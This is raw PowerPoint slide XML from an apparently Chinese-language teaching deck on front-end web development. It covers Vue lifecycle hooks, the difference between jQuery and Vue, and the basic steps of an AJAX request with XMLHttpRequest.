                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="13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86034" marR="86034" marT="43015" marB="43015" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="320488">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1300" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1">
                              <a:lumMod val="85000"/>
                              <a:lumOff val="15000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>beforeUpdate</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1">
                            <a:lumMod val="85000"/>
                            <a:lumOff val="15000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="86034" marR="86034" marT="43015" marB="43015" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="F4E9E9"/>
                    </a:solidFill>
                  </a:tcP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更新前</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86034" marR="86034" marT="43015" marB="43015" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="F4E9E9"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="320488">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1300" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1">
                              <a:lumMod val="85000"/>
                              <a:lumOff val="15000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>updated</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1">
                            <a:lumMod val="85000"/>
                            <a:lumOff val="15000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="86034" marR="86034" marT="43015" marB="43015" anchor="ct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更新后</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86034" marR="86034" marT="43015" marB="43015" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="320488">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1300" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1">
                              <a:lumMod val="85000"/>
                              <a:lumOff val="15000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>beforeDestroy</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1">
                            <a:lumMod val="85000"/>
                            <a:lumOff val="15000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="86034" marR="86034" marT="43015" marB="43015" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="F4E9E9"/>
                    </a:solidFill>
                  </a:tcP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销毁前</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86034" marR="86034" marT="43015" marB="43015" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="F4E9E9"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="320488">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1300" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1">
                              <a:lumMod val="85000"/>
                              <a:lumOff val="15000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>destroyed</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1300" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1">
                            <a:lumMod val="85000"/>
                            <a:lumOff val="15000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="86034" marR="86034" marT="43015" marB="43015" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <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销毁后</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="13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txBody>
                  <a:tcPr marL="86034" marR="86034" marT="43015" marB="43015" anchor="ctr"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6533700" y="1142427"/>
            <a:ext cx="5681980" cy="1383665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="t">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1 new Vue()对象,当vue对象创建完毕之前触发beforeCreate方法</a:t>
            </a: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2 new Vue()对象,当vue对象创建完毕触发created方法</a:t>
            </a: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3 vue挂载到dom元素之前触发beforeMount方法</a:t>
            </a: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4 vue挂载到dom元素之后触发mounted方法</a:t>
            </a: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5 数据模型中的数据发生变化,但是还没有改变dom元素时触发beforeUpdate方法</a:t>
            </a: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6 数据模型中的数据发生变化,dom元素也发生了改变时时触发Updated方法</a:t>
            </a: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7 vue对象销毁之前触发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>deforeDestroy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>方法</a:t>
            </a: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8 vue对象销毁之后触发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>destroyed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="灯片编号占位符 2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5" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">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文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="328930" y="1267460"/>
            <a:ext cx="4766310" cy="5224145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>VUE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>区别：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>vue 是一个前端框架，jquery 是javacript库，封装了一些js常用的方法，仅此而已。vue有成熟的生态链，mvvm模式，是一个真正的web框架</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5598795" y="1223010"/>
            <a:ext cx="6158230" cy="3161665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="201295" y="4302125"/>
            <a:ext cx="6017260" cy="2275840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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AJAX</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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3" name="组合 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="782320" y="1654698"/>
            <a:ext cx="10526664" cy="2337007"/>
            <a:chOff x="782320" y="1654698"/>
            <a:chExt cx="10526664" cy="2337007"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4" name="组合 3"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="782320" y="1654698"/>
              <a:ext cx="10526664" cy="2337007"/>
              <a:chOff x="920209" y="1823315"/>
              <a:chExt cx="10322211" cy="2337007"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="矩形: 对角圆角 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920209" y="1823317"/>
                <a:ext cx="10322211" cy="2337005"/>
              </a:xfrm>
              <a:prstGeom prst="round2DiagRect">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 4761"/>
                  <a:gd name="adj2" fmla="val 4001"/>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40000" bIns="180000" rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="360045" lvl="1" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="l"/>
                </a:pP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概念：</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Helvetica Neue" panose="02000503000000020004"/>
                  </a:rPr>
                  <a:t>A</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="333333"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Helvetica Neue" panose="02000503000000020004"/>
                  </a:rPr>
                  <a:t>synchronous </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Helvetica Neue" panose="02000503000000020004"/>
                  </a:rPr>
                  <a:t>J</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="333333"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Helvetica Neue" panose="02000503000000020004"/>
                  </a:rPr>
                  <a:t>avaScript </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Helvetica Neue" panose="02000503000000020004"/>
                  </a:rPr>
                  <a:t>A</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="333333"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Helvetica Neue" panose="02000503000000020004"/>
                  </a:rPr>
                  <a:t>nd </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Helvetica Neue" panose="02000503000000020004"/>
                  </a:rPr>
                  <a:t>X</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="333333"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="Helvetica Neue" panose="02000503000000020004"/>
                  </a:rPr>
                  <a:t>ML</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="333333"/>
                    </a:solidFill>
                    <a:latin typeface="Helvetica Neue" panose="02000503000000020004"/>
                  </a:rPr>
                  <a:t>，</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="C00000"/>
                    </a:solidFill>
                    <a:latin typeface="Helvetica Neue" panose="02000503000000020004"/>
                  </a:rPr>
                  <a:t>异步</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="333333"/>
                    </a:solidFill>
                    <a:latin typeface="Helvetica Neue" panose="02000503000000020004"/>
                  </a:rPr>
                  <a:t>的</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="333333"/>
                    </a:solidFill>
                    <a:latin typeface="Helvetica Neue" panose="02000503000000020004"/>
                  </a:rPr>
                  <a:t>JavaScript</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="333333"/>
                    </a:solidFill>
                    <a:latin typeface="Helvetica Neue" panose="02000503000000020004"/>
                  </a:rPr>
                  <a:t>和</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="333333"/>
                    </a:solidFill>
                    <a:latin typeface="Helvetica Neue" panose="02000503000000020004"/>
                  </a:rPr>
                  <a:t>XML</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lvl="1" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="150000"/>
                  </a:lnSpc>
                  <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                  <a:buChar char="l"/>
                </a:pP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作用：</a:t>
                </a:r>
                <a:endPar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17245" lvl="2" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="15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数据交换：通过</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Ajax</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可以给服务器发送请求，并获取服务器响应的数据。</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17245" lvl="2" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="15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异步交互：可以在</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不重新加载整个页面</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的情况下，与服务器交换数据并</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="14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更新部分网页</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的技术，如：搜索联想检索、用户名是否可用校验，等等。</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对角圆角 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920211" y="1823315"/>
                <a:ext cx="1105942" cy="431493"/>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4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Ajax</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="14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5" name="Shape 2621"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="943694" y="1721922"/>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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="组合 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1700250" y="5224780"/>
            <a:ext cx="3789485" cy="856045"/>
            <a:chOff x="6189785" y="5189611"/>
            <a:chExt cx="3789485" cy="856045"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="12" name="直接箭头连接符 15"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6189785" y="5477608"/>
              <a:ext cx="3789485" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="1905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6"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6189785" y="5758962"/>
              <a:ext cx="3789485" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="1905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41512" y="5189611"/>
              <a:ext cx="486030" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr fontAlgn="auto">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="12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请求</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="12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文本框 14"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7841512" y="5768657"/>
              <a:ext cx="486030" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr fontAlgn="auto">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="12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响应</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="12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6" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3292884" y="5545045"/>
            <a:ext cx="545123" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="36000" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Ajax</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>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3750" y="5043688"/>
            <a:ext cx="1115828" cy="1115828"/>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791" y="4966602"/>
            <a:ext cx="1270000" cy="1270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4962" y="4478080"/>
            <a:ext cx="3695633" cy="1681436"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699650" y="1321973"/>
            <a:ext cx="10698800"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endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699650" y="1795644"/>
            <a:ext cx="8942406" cy="1410891"/>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400"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-ea"/>
              <a:buAutoNum type="circleNumDbPlain"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>准备数据地址：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-ea"/>
              <a:buAutoNum type="circleNumDbPlain"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>创建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>对象：用于和服务器交换数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-ea"/>
              <a:buAutoNum type="circleNumDbPlain"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>向服务器发送请求</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="2400"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-ea"/>
              <a:buAutoNum type="circleNumDbPlain"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>获取服务器响应数据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 2621"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="394885" y="1388615"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="六边形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="183473" y="1293269"/>
            <a:ext cx="461175" cy="397565"/>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TextBox 2"/>
          <p:cNvSpPr txBox="1">
